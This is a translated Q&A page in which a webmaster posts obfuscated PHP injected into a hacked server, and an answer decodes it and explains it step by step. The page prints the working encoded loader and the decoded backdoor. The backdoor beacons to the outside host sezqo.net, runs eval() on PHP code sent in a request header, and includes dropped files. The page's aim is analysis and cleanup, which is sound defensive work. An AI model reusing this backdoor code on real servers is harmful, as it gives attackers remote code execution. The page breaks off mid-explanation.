我的服务器被黑客入侵,注入了编码代码.我不知道此代码的目的是什么?请任何人帮助我 [英] My server was hacked a encoded code was injected. i was not able to know what was the purpose of this code ? Please anybody help me
问题描述
我的php文件被黑客入侵,有人将一些编码文本注入到我的文件中.任何机构都可以帮助我了解此代码的实际作用.我无法对此进行解码.
my php files were hacked and some one injected some encoded text in my files. Can any body help my to understand what this code is actually doing. i am not able to decode this.
这是编码的代码段.
/*versio:3.01*/$II11=110426;if (!function_exists('I11lIl1I')){$GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*XJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdE8yMG9RZnBWbGhaQXRCY2ZPSFhKOEZFVER3UktOU1FpVnFoWlpxYk11VmgwN3NqZUZDdkh1WjJZdnRnTk9oZmpCWm1ibnNuUDVaaHhIeERoYXN5aE8yZHFnYThaWnZvblRGYzl5YXBvdkpBWjJ0RXRESG1kcHdKN2pnaGVHNXppSmx6aWU0YlNJWTV0NGJSS25jVkF3WHVQMVdxUmptM0RESERld3U4QjJ6b0J0QS91VmFCUGtxWnN5SGtRc2k0emp1ZTM3L3J4RlRvNDlrSEk4NHBMWi9jMk5TVjVJUmRuRVlaN3hlTU1NbnU4WUtNc1ozK1VwcWF0b012R1Q4U2hPbUlHYUVnZGVBZ2ZIOHhJVGxYdEtPUTEzZVVMSHlBTmFBaFRGczJnQVQrTEF3Z0NKNTRGQ2c2NlNKSHNLUUNpSXNpMUxxVWxjME9KUTlGazVOa0d6ZURzSXM1U3pGQUpLSHpuZm5yZmJsRmhFK1NOUGFOVWk5T1RKalg2R1ZEeURKUVZyU29weUVaTnhQUGR0ZSs2RHR4TkZOVUFVcUJDSytkNGJJQ1habG9zSFFsYkVreXNtZTJZaHNDWkswRkJxVytUeWZuSGozeTREK05jaUgvQTkzS0hyaC9WY1R5OCtUUmN0RXEzZ2JYKzl1Wmd1N3hlejVlSmlkbmVGRWlybGh3VXUvZGxzZXJsY2VwK24vdjJ5UlFhbWVDdVdvQXlQZUxhV1ExV1k4U0JNc29MVnFCaHd0dG55UDRZU2hqQlhhaWdkdityc0txck9GSmFxckVFMEZ4VlorQXZyb3FxNmtZMlZCMGNuYWVGVjIvYUIwbGMyZGYzS2lzZmVrZWJJZmtlQTI5RjJoMFdnVzRiK04xMlNGNVdGVjJwaEdvcGY1SHE1dkcwN2xnMkU3L24zRlA1ZFp3VS9KM0I0VVM2OUNrWlpMMWhGdDllM2dYOW4wVGExOFBobHVyanovRm1EMGZ1QzVhY1hQNkdtejhHNGxCZjZ0TTZuUjJ5NW82WW1WeTh5eWNrSk1kNDBOVG10MlArUWpsbEZ3OEtvUWkvVnZIQTZJOUVvazBoblVXT0FEQzltZ2oxdmsyek5ERm82MTlJcTRkNHVSYWhTdDcvWkR4V294SnNHT1hsUDJIeDlqelBaamtPVVJIdUNkdlhPQkdHR2hZOFpvVjhEYWltbVJjL0ZHZmtxUVh2QXRYM2NRc2ZtdjFrdW5iUG5ab1VxeDhIZGRBR3ArYVpZRHloNmpMM3NKRzRKdS8wK0JLaG55Z0tDZEZlY3dabnFqcmtOZjM3RkdJNEF5THRheEttSk9IWkhEQUJacTNFaG9xYmRxRzdoSkJpYUQzcWFUQTVmSVVjdXFZZ2QwTjR6WmJMZkdPNUNqemlPQ3JsaVcyN0JjNTRCL2tKOG1vejAwTnVPaWVtTXNweXR3a2Rvc0FBYlpWVVFsUUwzM3lvLzZDeW8zR1lDWEpIWXFwVDFoK2d4d2dCcStLYkVIMm8rRG9aaXVGV0lmVkFYM2h4OVROY3JlR1VjSFF6MUVOUGJ4MWdqWWh6bUMreDd6ejZ6SlJzVGVqQ2ZIWVF0Wi9BQkkxWXRtNTB1U0hWTUdBME5oa3VWNC8wT3dpSEpBWGVEZFp5ekVGYVNQNGJxZlVCWkY0anBDaUFpQ0s2OG0ya1FtTlluYndGZzd5Kytnb1hiaThVRkhGVkIyOWoxRjNtKyttTVEybDZ6MyszaWNRUE5TOXQ4czIxYkVVemkwMTBhUDFjazczS3FLWlhIZFBuNWxqN3NVNllsYVRyN1VyK2hmNEpYZXhRbElPeWc5bko1MkFHNHJOWUJsdyttcHQ1SkFCamsxZkxuMC9aVUxROXRLVlFjNElaUTVReDRleld2QW9KVmo2M3UrNnJZajlTSVUwU3hTWWlqNVRaR1ZxNCtSZkNVeDN6MUkyRjdrdElaWENna2NVeCtnUDFmR2lYTGNTbXVqVVZoaXhaSnF1bUlZQS93OGtMa2VtclVpcWt2NmtWdmo3ckRCTlRidnFzUm9hbkd5eGFSZTVKdno5M0padDNYTmkwMTdCUStXZ29PRWY0QXoyRmxXek8zcVN5dHlybCtGeXZkVXRySGYvRytWQ25RRmJneVlKcGExem1VNkh3QVFEc0lFUGdxMTFWbTFmUG1jN3VDa2M0SUVSQ25veHc5YXNMc3phbHFRYmR4TzVFMUtDSlJjUnhiUGxBT2x6cWpoMTVXdXd1TVJkOVZialM1M2UyVVVBS2ZFT3ozS3RGU0gvU3hPOElSMGFwZ3Bvc2czelZsVlR6SDNKQUZBbHNaM0hBZ3VGZTRZNDdseXVVaFlmTDNxZEh0RGNSM3pON1UwT3REZFd1QXQvWWNHY0xUK2pDK1pKdmhKdVMvblNuQ2hWYkpQWEpkNFozb0h0QWgvSjFFY2w4OFdCTTFtNzJ1U0l3c0pyWE9UM2JZVVNqWk9CUExic0J0RHZ1WUdjbzJMTmU0ZjVtd2lIQnFLUi9WRDZrZGZvaWxybHkwcEtEY3NESGM3aEtXdDcyKzE0Z2h2N3pLNnNmczgyd1hQaHIxamdCZ0RKUGRtZ1ZaR3JJOVRxM2pkV0xoTXd1dFNlUlJlN25FKzFwNCttSUJxRWVzZHlZS1VIZldXeWRNdGI0RHB0UUNxVWh5SmNJRm05UUdYVzhnVnl4TDNhb1MxaHVKaFVZRFE1MHhGSTY5NzZpKzNaVWlzZ2ZGVWo2WFMvbTdyMWdVZ0dXMStwQWROd1ZWb3EvNk5EbU1UR3EzK2g4cWFYNkIiKSkpOwWn=&kcHJlZ19yZXBsYWNl';function I11lIl1I($a, $b){$c=$GLOBALS['II11']; $d=pack('H*','6261736536345f6465636f'.'6465'); return $d(substr($c, $a, $b));};$QO0000QQ0 = I11lIl1I(3374, 16);$QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");};
推荐答案
简短回答
它向具有" http://sezqo.net/w3.php 的僵尸网络或蠕虫宣布自己.作为消息中继.此中继很可能只是一台以相同方式被黑客入侵的服务器. 然后,该网络"可以将包含要执行的实际代码的请求发回(可能不是立即,而是稍后).该代码可以替换您的网站(在所有或某些特殊情况下,脚本仅在您的代码之前执行),并且可以执行PHP脚本可以执行的其他任何操作.
Short Answer
It announces itself to a bot network or worm, which has "http://sezqo.net/w3.php" as a message relay. This relay is most probably only a server hacked the same way. This "network" then may send a request back (maybe not immediately, but much later) containing the real code to be executed. This code may either replace your website (in all or only some special cases, the script is just executed in front of your code) and it may do anything else a PHP script can do.
if (!defined("determinator")) {
if (function_exists("ini_set")) {
@ini_set("allow_url_fopen", 1);
@ini_set("display_errors", 0);
}
function w3net_feof($f, &$time = NULL) {
$time = microtime(true);
return feof($f);
}
function w3net_getfile($host, $URI) {
if (@ini_get("allow_url_fopen") == "1") {
return @file_get_contents("http://" . $host . $URI. "&w=fgc");
} elseif (function_exists("curl_init")){
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL, "http://" . $host . $URI. "&w=cu");
@curl_setopt($ch, CURLOPT_HEADER, false);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 6);
$curl_result = @curl_exec($ch);
@curl_close($ch);
if (empty($curl_result)) {
$curl_result = "";
}
return $curl_result;
} else {
$f = @fsockopen($host, 80, $errno, $errstr, 5);
if ($f) {
$data = "";
$time = NULL;
@fputs($f, "GET {$URI}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$host}\r\n");
$useragent = PHP_OS."/".PHP_VERSION;
@fputs($f, "User-Agent: {$useragent}\r\n\r\n");
while(!w3net_feof($f, $time) && (microtime(true) - $time) < 2) {
$data .= @fgets($f, 128);
}
@fclose($f);
$parts = explode("\r\n\r\n", $data);
unset($parts[0]);
return implode("\r\n\r\n", $parts);
}
}
}
function w3net_output($key, $val) {
echo "Y_".$key.":".$val."\r\n";
}
function php_server($varname){
return @$_SERVER[$varname];
}
$version1="ftp/201309";
$version2="3.01";
$host="http://";
if (isset($_SERVER["HTTPS"])) {
if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
}
$host.=strtolower(@$_SERVER["HTTP_HOST"]);
foreach ($_GET as $key=>$val) {
if (strpos($val,"union")) {
$_GET[$key]="";
} elseif (strpos($val,"select")) {
$_GET[$key]="";
}
}
if(!isset($_SERVER["REQUEST_URI"])) {
$_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
if(isset($_SERVER["QUERY_STRING"])) {
$_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
}
}
function get_temp_directory() {
$result=dirname(__FILE__).DIRECTORY_SEPARATOR;
$tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );
foreach ($tmpdirs as $tmpdir){
if (!empty($tmpdir)){
$tmpdir.=DIRECTORY_SEPARATOR;
if (@is_writable($tmpdir)) {
$result = $tmpdir; break;
}
}
}
return $result;
}
if (strlen($host) < 10) {
define("determinator", 0);
} elseif ($requestURL=$host.@$_SERVER["REQUEST_URI"]) {
$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
$w3n_code=get_temp_directory().".".$hash;
define("determinator", $w3n_code);
$IlIlII = $w3n_code.".log";
if (@$_SERVER["HTTP_Y_AUTH"]==$hash) {
echo "\r\n";
w3net_output("versio", $version2."-".$version1."-php");
if ($code=base64_decode(@$_SERVER["HTTP_EXECPHP"])){
@eval($code);
echo "\r\n";
w3net_output("out", "ok");
}
exit(0);
}
$found = False;
$ua = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $pattern) {
if (strpos($ua, $pattern)!==False) {
$f = @fopen($w3n_code.".log", "a");
$requestURI_encoded = @urlencode(@$_SERVER["REQUEST_URI"]);
@fwrite($f, time()."\t".$pattern."\t".$requestURI_encoded."\n");
@fclose($f);
$found=True;
break;
}
}
if (@is_file($w3n_code)) {
@touch($w3n_code);
@include_once($w3n_code);
} elseif ($found === True) {
if (@touch($w3n_code)) {
$requestURL=@urlencode($requestURL);
$URI = "/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
$data = w3net_getfile("sezqo.net", $URI);
@touch($w3n_code);
}
}
} else {
define("determinator", 1);
}
}
脚本的作用(详细说明)
好的,它是做什么的?它首先尝试取消一些PHP安全限制(启用"allow_url_fopen"和禁用"display_errors").然后,它定义函数w3net_feof()(由w3net_getfile()使用)和w3net_getfile($ host,$ URI). w3net_getfile用于从URL提取数据.它尝试不同的可能性,例如file_get_contents(如果允许allow_url_fopen),libcurl和通过fsocket函数的简单HTTP实现.它还定义了一个函数w3net_output(),该函数用于作为启动此脚本的请求的结果输出键/值对.它定义了一个函数php_server()来从$ _SERVER检索变量,但是从未使用过.
What the script does (detailed explaination)
OK, what does it do? It first tries to unset some PHP security restrictions (enable "allow_url_fopen" and disable "display_errors"). Then it defines functions w3net_feof() (used by w3net_getfile()) and w3net_getfile($host, $URI). w3net_getfile is used to fetch the data from a URL. It tries different possibilities as file_get_contents (if allow_url_fopen is allowed), libcurl and a simple HTTP implementation via fsocket functions. It also defines a function w3net_output() which is used to output key/value pairs as result of the Request that starts this script. It defines a function php_server() to retrieve variables from $_SERVER, but is never used.
完成此操作后,它会设置一些版本字符串($ version1和$ version2,似乎是脚本本身的标识符).然后,它构造一个变量,该变量包含使您可以访问脚本的URL的$ host部分(包括http://或https://).然后从包含联合"和选择"的值中清除$ _GET变量(将值设置为空字符串).我认为这是用来缩短最终到达的网址.并且-如果尚未设置-将$ _SERVER变量"REQUEST_URI"设置为$ _SERVER ["SCRIPT_NAME"].?".$ _ SERVER ["QUERY_STRING"].
Having done this, it sets some version strings ($version1 and $version2, seems to be an identifier for the script itself). Then it constructs a variable that contains the $host part (including http:// or https://) of the URL that enables to reach your script. It then cleans the $_GET variable from values that contain "union" and "select" (sets the values to a empty string). I assume this is used to shorten the final URL. And -if not yet set - it sets the $_SERVER variable "REQUEST_URI" to $_SERVER["SCRIPT_NAME"]."?".$_SERVER["QUERY_STRING"].
下一步,它定义了一个寻找可写目录的函数,该目录可以放置一些下载内容.
As a next step, it defines a function that looks for a writeable directory, where it can place some downloads.
下一步是检查$ host("https://"或"http://"短于10个字符.如果是这种情况,它将停止任何进一步的操作.只有在以下情况下,服务器的HTTP主机名少于3个字符.这可能是一种阻止此脚本在主机名非常短的特殊设置(例如在开发环境中)上工作的方法.
The next step is to check if $host ("https://" or "http://" is shorter than 10 characters. If this is the case, it stops any further action. This is only the case if the HTTP-Host-Name of the server is shorter than 3 characters. This might be some way to block this script from working on special setups where the hostname is very short (as in a development environment).
下一步是尝试,如果$ host.@ $ _ SERVER ["REQUEST_URI"]可以构建$ requestURL,如果可以,它将继续执行以下操作:
The next step is to try, if a $requestURL can be built by $host.@$_SERVER["REQUEST_URI"] and if so, it continues the following:
- 它构造一个哈希值$ hash(使用
$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");),该值通过主机名,PHP-OS(版本),版本字符串的$ version2"3.01"部分和一些盐"QQ0OQ000000Q0OQ0Q"来标识本地系统. /li> - 然后,它检查当前请求是否具有与该哈希值相等的标头"HTTP_Y_AUTH".如果是这样,它将通过w3net_output()向请求的客户端计算机返回一些版本信息.然后,它寻找另一个HTTP标头"HTTP_EXECPHP",该标头使用eval()作为PHP代码直接执行.此后,脚本通过w3net_output()机制输出return/linefeed和"out" ="ok".然后,它通过exit(0)停止脚本.该部分允许知道确切哈希键的远程计算机访问此脚本并在您的计算机上执行PHP代码.
- 如果哈希不匹配(或未发送哈希),它将检查用户代理"是否匹配某些模式(google,yahoo,baidu,bingbot,msnbot,yandex的任何字符串).这些是搜索引擎爬网程序的访问.如果是这样,它将此访问记录到使用
$w3n_code.".log"命名的日志文件中,其中$w3n_code=get_temp_directory().".".$hash;(找到的哈希目录,附加哈希值,然后附加".log").它写了一行,由unixtimestamp,匹配的模式(标识搜索引擎)和编码的requestURI(制表符分隔)组成.我假设这是用来记录该位置预期有多少搜索引擎流量.如果那里的访问量很大,则网站"可能已售出或可通过插入一些指向其他网站的链接来提高某些网站的页面排名.还将变量$ found设置为"true",将流量标记为搜索引擎搜寻器". - 下一步,它检查文件
$w3n_code是否存在,文件名类似于上面的日志文件,但末尾没有".log".如果是这样,它将运行包含的PHP代码. - 如果该脚本尚不存在,它将检查当前请求是否已被$ found = true;标记为搜索引擎流量.在这种情况下,脚本会通过对
"http://sezqo.net/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2的请求将自身声明为网络.该请求包含$ requestURL(如何访问服务器上的此脚本),哈希键(允许进行身份验证并向脚本发送另一个要执行的PHP脚本),类型'php'以及版本字符串$ version1和$ version2.此后,它将调用touch()创建一个名为$w3n_code的空脚本文件.因此,此请求仅发送一次,第一个搜索引擎通过.
- It constructs a Hash value $hash (using
$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");) which identifies the local System by Hostname, PHP-OS (version), the $version2 "3.01" part of the version string and some salt "QQ0OQ000000Q0OQ0Q". - It then checks, if the current Request has a header "HTTP_Y_AUTH" that equals this hash. If so, it returns some version info to the requesting client machine via w3net_output(). Then it looks for another HTTP header "HTTP_EXECPHP" which is directly executed as PHP code using eval(). After this, the script outputs a return/linefeed and "out" = "ok" via the w3net_output() mechanism. Then it stops the script via exit(0). This part allows a remote machine that knows the exact hash key to access this script and execute PHP code on your machine.
- If the hash did not match (or no hash was sent), it checks if the "User Agent" matches some patterns (any string of google,yahoo,baidu,bingbot,msnbot,yandex). These are accesses by search engine crawlers. If so it logs this access into a log file which is named using
$w3n_code.".log"where$w3n_code=get_temp_directory().".".$hash;(the hash directory found, the hash value appended and then ".log" appended). It writes one line, consisting of a unixtimestamp, the matched pattern (identifying the search engine) and the encoded requestURI (tab delimited). I assume this is used to log how many search engine traffic is to be expected for this location. If there is a lot of traffic there, the "site" is maybe sold or can be used to push the page rank of some websites by inserting some links to other sites. Also a variable $found is set to "true" that marks the traffic as "search engine crawler". - As a next step, it checks if a file
$w3n_codeexists, the filename is like the log file above, but without ".log" at its end. If so it runs the contained PHP code. - If this script did not exist yet, it checks if the current request was marked (by $found=true;) as search engine traffic. In that case the script announces itself to network, by a request to
"http://sezqo.net/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2. This request contains the $requestURL (how to reach THIS script on your server), the Hash key (that allows to authenticate and to send the script another PHP script to execute) and a type 'php' aswell as the version strings $version1 and $version2. After this, it calls touch() to create an empty scriptfile named$w3n_code. So this request is sent only once, the first search engine comes by.
进一步调试
将以下脚本保存到您的网页(同一服务器)上,并使用https://和http://通过浏览器执行它.它使用上面脚本的一部分,该脚本生成$ hash并估计存储目录.它输出网络插入的脚本(如果已经)和日志文件的文件名.在同一目录中查找具有相似名称的任何其他文件(尤其是* .log文件).日志文件将为您提供上述蠕虫"入侵系统的信息(可能有多个位置).如果不存在带有".log"的文件,则已被感染的脚本已经向网络发布,并且可能已经执行了通过网络发送的所有代码.如果包含脚本,则每次调用您的网站脚本(包含上面的代码)时,都会插入/执行此脚本...
Further Debugging
Save the following script to your web page (same server) and execute it through the browser, using https:// and http://. It uses the part of the above script which generates the $hash and estimates the storage directory. It outputs the filenames of the script that the network inserted (if already) and of the logfile. In the same directory look for any other files with similar names (especially *.log files). The logfiles will give you information where the "worm" described above has intruded the system (there may be multiple locations). If file without ".log" already exists, the infected script was already announced to the network and might already have executed any code that was send trough the network. If it contains a script, this script is inserted / executed every time your websites script (containing the above code) is called...
注意:未找到这些文件并不能保证没有任何反应!由于网络可能已经发送了删除所有这些痕迹的PHP脚本...
NOTE: Not finding those files is not a guarantee, that nothing has happend! As the network might already have send a PHP-script that removed all those traces...
<?php
function get_temp_directory() {
$result=dirname(__FILE__).DIRECTORY_SEPARATOR;
$tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );
foreach ($tmpdirs as $tmpdir){
if (!empty($tmpdir)){
$tmpdir.=DIRECTORY_SEPARATOR;
if (@is_writable($tmpdir)) {
$result = $tmpdir; break;
}
}
}
return $result;
}
$version1="ftp/201309";
$version2="3.01";
$host="http://";
if (isset($_SERVER["HTTPS"])) {
if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
}
$host.=strtolower(@$_SERVER["HTTP_HOST"]);
$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
$w3n_code=get_temp_directory().".".$hash;
echo "FILENAMES:<br>\n";
echo $w3n_code."<br>\n";
echo $w3n_code.".log<br>\n";
?>
我如何提取脚本
好吧,要知道它的作用,我对您的脚本进行了解码和分析.这是...
How I did extract the script
Ok, to know what it does, I decoded and analyzed your script. Here is how...
首先,我们将其格式化得更好:
First we format it a bit more nicely:
/*versio:3.01*/
$II11=110426;
if (!function_exists('I11lIl1I')){
$GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*XJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdE8yMG9RZnBWbGhaQXRCY2ZPSFhKOEZFVER3UktOU1FpVnFoWlpxYk11VmgwN3NqZUZDdkh1WjJZdnRnTk9oZmpCWm1ibnNuUDVaaHhIeERoYXN5aE8yZHFnYThaWnZvblRGYzl5YXBvdkpBWjJ0RXRESG1kcHdKN2pnaGVHNXppSmx6aWU0YlNJWTV0NGJSS25jVkF3WHVQMVdxUmptM0RESERld3U4QjJ6b0J0QS91VmFCUGtxWnN5SGtRc2k0emp1ZTM3L3J4RlRvNDlrSEk4NHBMWi9jMk5TVjVJUmRuRVlaN3hlTU1NbnU4WUtNc1ozK1VwcWF0b012R1Q4U2hPbUlHYUVnZGVBZ2ZIOHhJVGxYdEtPUTEzZVVMSHlBTmFBaFRGczJnQVQrTEF3Z0NKNTRGQ2c2NlNKSHNLUUNpSXNpMUxxVWxjME9KUTlGazVOa0d6ZURzSXM1U3pGQUpLSHpuZm5yZmJsRmhFK1NOUGFOVWk5T1RKalg2R1ZEeURKUVZyU29weUVaTnhQUGR0ZSs2RHR4TkZOVUFVcUJDSytkNGJJQ1habG9zSFFsYkVreXNtZTJZaHNDWkswRkJxVytUeWZuSGozeTREK05jaUgvQTkzS0hyaC9WY1R5OCtUUmN0RXEzZ2JYKzl1Wmd1N3hlejVlSmlkbmVGRWlybGh3VXUvZGxzZXJsY2VwK24vdjJ5UlFhbWVDdVdvQXlQZUxhV1ExV1k4U0JNc29MVnFCaHd0dG55UDRZU2hqQlhhaWdkdityc0txck9GSmFxckVFMEZ4VlorQXZyb3FxNmtZMlZCMGNuYWVGVjIvYUIwbGMyZGYzS2lzZmVrZWJJZmtlQTI5RjJoMFdnVzRiK04xMlNGNVdGVjJwaEdvcGY1SHE1dkcwN2xnMkU3L24zRlA1ZFp3VS9KM0I0VVM2OUNrWlpMMWhGdDllM2dYOW4wVGExOFBobHVyanovRm1EMGZ1QzVhY1hQNkdtejhHNGxCZjZ0TTZuUjJ5NW82WW1WeTh5eWNrSk1kNDBOVG10MlArUWpsbEZ3OEtvUWkvVnZIQTZJOUVvazBoblVXT0FEQzltZ2oxdmsyek5ERm82MTlJcTRkNHVSYWhTdDcvWkR4V294SnNHT1hsUDJIeDlqelBaamtPVVJIdUNkdlhPQkdHR2hZOFpvVjhEYWltbVJjL0ZHZmtxUVh2QXRYM2NRc2ZtdjFrdW5iUG5ab1VxeDhIZGRBR3ArYVpZRHloNmpMM3NKRzRKdS8wK0JLaG55Z0tDZEZlY3dabnFqcmtOZjM3RkdJNEF5THRheEttSk9IWkhEQUJacTNFaG9xYmRxRzdoSkJpYUQzcWFUQTVmSVVjdXFZZ2QwTjR6WmJMZkdPNUNqemlPQ3JsaVcyN0JjNTRCL2tKOG1vejAwTnVPaWVtTXNweXR3a2Rvc0FBYlpWVVFsUUwzM3lvLzZDeW8zR1lDWEpIWXFwVDFoK2d4d2dCcStLYkVIMm8rRG9aaXVGV0lmVkFYM2h4OVROY3JlR1VjSFF6MUVOUGJ4MWdqWWh6bUMreDd6ejZ6SlJzVGVqQ2ZIWVF0Wi9BQkkxWXRtNTB1U0hWTUdBME5oa3VWNC8wT3dpSEpBWGVEZFp5ekVGYVNQNGJxZlVCWkY0anBDaUFpQ0s2OG0ya1FtTlluYndGZzd5Kytnb1hiaThVRkhGVkIyOWoxRjNtKyttTVEybDZ6MyszaWNRUE5TOXQ4czIxYkVVemkwMTBhUDFjazczS3FLWlhIZFBuNWxqN3NVNllsYVRyN1VyK2hmNEpYZXhRbElPeWc5bko1MkFHNHJOWUJsdyttcHQ1SkFCamsxZkxuMC9aVUxROXRLVlFjNElaUTVReDRleld2QW9KVmo2M3UrNnJZajlTSVUwU3hTWWlqNVRaR1ZxNCtSZkNVeDN6MUkyRjdrdElaWENna2NVeCtnUDFmR2lYTGNTbXVqVVZoaXhaSnF1bUlZQS93OGtMa2VtclVpcWt2NmtWdmo3ckRCTlRidnFzUm9hbkd5eGFSZTVKdno5M0padDNYTmkwMTdCUStXZ29PRWY0QXoyRmxXek8zcVN5dHlybCtGeXZkVXRySGYvRytWQ25RRmJneVlKcGExem1VNkh3QVFEc0lFUGdxMTFWbTFmUG1jN3VDa2M0SUVSQ25veHc5YXNMc3phbHFRYmR4TzVFMUtDSlJjUnhiUGxBT2x6cWpoMTVXdXd1TVJkOVZialM1M2UyVVVBS2ZFT3ozS3RGU0gvU3hPOElSMGFwZ3Bvc2czelZsVlR6SDNKQUZBbHNaM0hBZ3VGZTRZNDdseXVVaFlmTDNxZEh0RGNSM3pON1UwT3REZFd1QXQvWWNHY0xUK2pDK1pKdmhKdVMvblNuQ2hWYkpQWEpkNFozb0h0QWgvSjFFY2w4OFdCTTFtNzJ1U0l3c0pyWE9UM2JZVVNqWk9CUExic0J0RHZ1WUdjbzJMTmU0ZjVtd2lIQnFLUi9WRDZrZGZvaWxybHkwcEtEY3NESGM3aEtXdDcyKzE0Z2h2N3pLNnNmczgyd1hQaHIxamdCZ0RKUGRtZ1ZaR3JJOVRxM2pkV0xoTXd1dFNlUlJlN25FKzFwNCttSUJxRWVzZHlZS1VIZldXeWRNdGI0RHB0UUNxVWh5SmNJRm05UUdYVzhnVnl4TDNhb1MxaHVKaFVZRFE1MHhGSTY5NzZpKzNaVWlzZ2ZGVWo2WFMvbTdyMWdVZ0dXMStwQWROd1ZWb3EvNk5EbU1UR3EzK2g4cWFYNkIiKSkpOwWn=&kcHJlZ19yZXBsYWNl';
function I11lIl1I($a, $b){
$c=$GLOBALS['II11'];
$d=pack('H*','6261736536345f6465636f'.'6465');
return $d(substr($c, $a, $b));
};
$QO0000QQ0 = I11lIl1I(3374, 16);
$QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");
};
我们看到,代码将检查是否已经存在函数I11lIl1I,如果不存在,它将定义该函数并执行一些代码.此函数有两个参数$ a和$ b,它们定义了解码字符串的某些部分,该字符串稍后在此函数中使用substr()删除.该函数获取编码文本$GLOBALS['II11']并将其存储在$c中. $d设置为pack('H*','6261736536345f6465636f'.'6465'),结果为base64_decode.此函数用于使用限制$ a和$ b解码从$ c切出的部分.用$ a = 3374,$ b = 16调用该函数,导致preg_replace存储为$ QO0000QQ0.然后调用preg_replace("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");.再次使用解码功能I11lIl1I从编码的字符串中获取一些数据($ a = 507,$ b = 2862).
We see, that the code checks, if a function I11lIl1I exists already, if not it defines this function and executes some code. This function takes two parameters $a and $b, which define some part of the decoded string, which is cut out using substr() later in this function. The function takes the encode text $GLOBALS['II11'] and stores it in $c. $d is set to pack('H*','6261736536345f6465636f'.'6465') which results in base64_decode. This function is used to decode the part cut out of $c using the limits $a and $b. The function is called with $a = 3374, $b = 16, resulting in preg_replace which is stored as $QO0000QQ0. Then preg_replace("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO"); is called. Whereas the decoding function I11lIl1Iis used again to fetch some data from the encoded string ($a = 507, $b = 2862).
I11lIl1I(507,2862)中的数据是:
